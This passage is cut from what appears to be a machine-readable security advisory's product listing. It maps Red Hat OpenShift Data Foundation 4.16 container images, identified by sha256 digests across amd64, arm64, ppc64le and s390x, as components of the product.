relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", }, product_reference: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", }, product_reference: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", }, product_reference: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", }, product_reference: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", }, product_reference: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", }, product_reference: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", }, product_reference: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", }, product_reference: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", }, product_reference: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", }, product_reference: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", }, product_reference: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", }, product_reference: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", }, product_reference: 